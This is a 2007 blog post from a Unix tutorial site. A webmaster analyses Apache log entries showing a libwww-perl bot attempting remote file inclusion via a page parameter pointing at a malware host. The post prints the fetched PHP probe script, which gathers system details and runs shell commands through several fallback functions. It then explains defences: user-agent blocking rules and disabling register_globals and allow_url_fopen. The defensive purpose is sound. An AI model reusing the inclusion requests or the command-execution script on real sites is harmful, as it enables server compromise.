FreeBSD - Tutorials, Security
Home   Archives   Sitemap   About   Contact

libwww-perl/5.805 User agent (bot) visited my website

Home NEW! Unix Forum News 100 Tips and Tricks Website Development Server Operating Systems Databases
 Ivorde.ROarrow Website Development arrowWebsite Securityarrowlibwww-perl/5.805 User agent (bot) visited my website 

Article Sections

    Hello, Guest !
User name:
Password:
 
Google

 SSD VPS Hosting - Vpsie.com
 Mo.nitor.me
 Ivorde forum
 FreeBSD Tutorials
 Linux LVM Commands
 Free Shell Accounts
 FreeBSD Project
 FreeBSD Handbook
 Advanced Bash-Scripting Guide
 The OpenBSD Project
 Distrowatch
 FreeBSD Handbook


Apache Webserver Home Page

Posted on: 22 Nov 2007
Author: admin
Section: Website Development | Website Security
Views: 832
Comments: 0 (Add)

libwww-perl/5.805 User agent (bot) visited my website
Weird User-Agent - bot while going through my Apache website logs: libwww-perl/5.805

 



One day, while monitoring apache logs I started to see many lines looking like the one in the table below. The exact output of the logs (including user-agent and url requested and IP address are) is:

[root@server apache/]# grep perl accesslog
71.172.97.52 - - [22/Nov/2007:20:03:10 +0200] "GET /index.php?page=http://malware.t35.com/safe.txt? HTTP/1.1" 200 22877 "-" "libwww-perl/5.805"
71.172.97.52 - - [22/Nov/2007:20:03:11 +0200] "GET /index.php?page=http://malware.t35.com/safe.txt? HTTP/1.1" 200 43780 "-" "libwww-perl/5.805"
71.172.97.52 - - [22/Nov/2007:20:03:12 +0200] "GET /Server_Operating_Systems/index.php?page=http://malware.t35.com/safe.txt? HTTP/1.1" 200 34275 "-" "libwww-perl/5.805"
71.172.97.52 - - [22/Nov/2007:20:03:13 +0200] "GET /register/index.php?page=http://malware.t35.com/safe.txt? HTTP/1.1" 200 16685 "-" "libwww-perl/5.805"

So the user from IP addresss 71.172.97.52 thought that by requesting this url from my server is going to tell it to download http://malware.t35.com/safe.txt? script and run it.

I took a look at the script that this libwww-perl bot was trying to and here it is:

$dir = @getcwd();
$ker = @php_uname();
echo "enemy";
$OS = @PHP_OS;
echo "
OSTYPE:$OS
";
echo "
Kernel:$ker
";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("
",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}


Then I searched a little on Google it seems that this bot is a
well-known perl library and perl module and and lwp-request
which is a simple command line user agent).
It could be just about anything - a homemade bot or
custom browser or somebody running a script.
It's a very generic tool. But by this request it's
for sure somebody running a script.

It can be blocked very well with Apache mod_setenvif directive
adding the following lines in your
.htaccess or httpd.conf file:
SetEnvIfNoCase User-Agent libwww-perl bad_bots
order deny,allow
deny from env=bad_bots

or

SetEnvIfNoCase User-Agent "libwww-perl" bad_bot=1
SetEnvIfNoCase User-Agent "psycheclone" bad_bot=1
#
# Allow universal access to robots.txt and custom 403 error page
SetEnvIf Request_URI "robots.txt$" allow_all=1
#
Order Deny,Allow
Allow from env=allow_all
Deny from env=bad_bot

The above lines set the environment bad_bot to 1 for every visitor/user-agent that contains 
libwww-perl or psycheclone and blocks them), and environment allow_all to 1 for every request
of robots.txt file (and allows them) and they should e added to .htaccess file in your website's
DocumentRoot, httpd.conf or bad_bots.conf (which must be included in httpd.conf with
Include /path/to/bad_bots_file.conf line).

Besides this, you have to make sure that the following two variables are set to Off in
/usr/local/etc/php.ini under FreeBSD) or usr/local/apache/php/php.ini (under Linux):

register_globals = Off
allow_url_fopen = Off

First line disables the user of use of Register Globals:

When on, register_globals will inject your scripts with all
sorts of variables, like request variables from HTML forms. This
coupled with the fact that PHP doesn't require variable initialization
means writing insecure code is that much easier. It was a difficult
decision, but the PHP community decided to disable this directive by
default. When on, people use variables yet really don't know for sure

where they come from and can only assume.

and second line disables opening/including files from remote URLs:

If enabled, allow_url_fopen allows PHP's file functions -- such as file_get_contents()
and the include and require statements -- can retrieve data from remote locations,
like an FTP or web site. Programmers frequently forget this and don't do proper input
filtering when passing user-provided data to these functions, opening them up to code
injection vulnerabilities. A large number of code injection vulnerabilities reported in
PHP-based web applications are caused by the combination of enabling allow_url_fopen
and bad input filtering.


Usefull links:
http://www.webmasterworld.com/analytics/3508143.htm
http://www.webmasterworld.com/apache/3448091.htm
http://httpd.apache.org/docs/1.3/mod/mod_setenvif.html
http://cz2.php.net/register_globals
http://phpsec.org/projects/phpsecinfo/tests/allow_url_fopen.html
Bookmarks: Echo "libwww-perl/5.805 User agent (bot) visited my website" around:
del.icio.usdiggFurlYahooMyWebGoogleBookmarksFaceBookTechnocratti
Test king prepares students for computer certifications with modern testing facilities providing tests like 1Y0-258. Test king prepares and trains students for Microsoft certifications with tests such as 70-271 and 70-553. Test king is known for training students for Cisco certifications with tests like 642-176 and 646-171. Test king is also preparing students on the exam patterns taken from the real exams in tests such as 642-586 and 310-200.

Other articles in Website Development / Website Security
» How to create onclick confirmations for hyperlinks
» www.ivorde.ro Is Valid XHTML 1.0 Transitional!
» LIGHTTPD - create virtual hosts - subdomains - quick how-to
» How to prevent visitors from viewing .htaccess and .htpasswd files
» Apache+SSL How to build a secure webserver




Contact webmaster regarding this article
Register or Login to post your article
Hello, Guest ! You can Login or Register to www.ivorde.ro!

 Post comment:

Name:
Title:
Comment:
Please type the word you see in the image (anti-spam verification). Refresh the page if you don't understand the word.
Allowed HTML Tags for comments:<p><strong><em><u><h1><h2><h3><h4><h5><h6><img><li>
<ol><ul><span><div><br><ins><del>

0 comment(s) to libwww-perl/5.805 User agent (bot) visited my website:

   Latest topics on the forum:
 
   Most viewed articles:
How to copy a mysql database using mysqldump - 10087 views
How to change a user's password in AIX with the output from ECHO command - 9286 views
FreeBSD: Add/remove an additional IP alias - 6453 views
Qmail relay to smarthost: How to route all mail to a smarthost - 4364 views
Change user shell on FreeBSD Linux and AIX - 3118 views

   Latest 10 articles:
Qmail relay to smarthost: How to route all mail to a smarthost - 03 Feb 2009
EXIM 4 relay to smarthost: How to route all mail except local domain - 03 Feb 2009
Windows XP: print LISTEN ports and network connections using netstat - 30 Jan 2009
How to cut out first last n characters from each file name, from a filelist - 04 Nov 2008
Mozilla Firefox3 is now released - 18 Jun 2008
How to switch lower case to upper case and upper case to lower case in a string - 17 Jun 2008
How to rename files/directories to uppercase/lowercase character names - 17 Jun 2008
How to convert lower case to upper case letters in a shell script/command - 17 Jun 2008
Unix,Linux,FreeBSD - How to rename a list of files, replacing spaces inside their names - 12 Jun 2008
How to change a user's password in AIX with the output from ECHO command - 21 May 2008


Archives
» 2007  |  June  |  October  |  November  |  December
» 2008  |  January  |  February  |  March  |  April  |  May  |  June  |  November
» 2009  |  January  |  February



Home | Archives | Sitemap | About | Contact

Designed and developed by Andrei Manescu. Optimized for Mozilla Firefox.  
Copyright 2007 Andrei Manescu
All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by those who posted them.
Valid W3 Document Valid XHTML 1.0 Transitional Valid CSS! The FreeBSD Project Viewable With Any Browser